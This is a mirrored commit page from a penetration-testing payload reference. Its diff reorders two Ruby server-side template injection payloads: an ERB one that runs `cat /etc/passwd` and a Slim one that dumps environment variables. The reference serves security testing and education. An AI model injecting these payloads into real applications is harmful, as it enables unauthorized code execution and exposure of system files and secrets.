mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings
synced 2025-12-06 17:02:53 +01:00
Sorting like basic injection part
This commit is contained in:
parent
7f1fb32980
commit
712e3b93f6
1 changed files with 5 additions and 6 deletions
|
|
@ -91,17 +91,16 @@ Slim:
|
||||||
|
|
||||||
### Code execution
|
### Code execution
|
||||||
|
|
||||||
Execute code using SSTI for Slim engine.
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
#{ %x|env| }
|
|
||||||
```
|
|
||||||
|
|
||||||
Execute code using SSTI for ERB engine.
|
Execute code using SSTI for ERB engine.
|
||||||
|
|
||||||
```ruby
|
```ruby
|
||||||
<%= system('cat /etc/passwd') %>
|
<%= system('cat /etc/passwd') %>
|
||||||
```
|
```
|
||||||
|
Execute code using SSTI for Slim engine.
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
#{ %x|env| }
|
||||||
|
```
|
||||||
|
|
||||||
## Java
|
## Java
|
||||||
|
|
||||||
|
|
|
||||||
Loading…
Reference in a new issue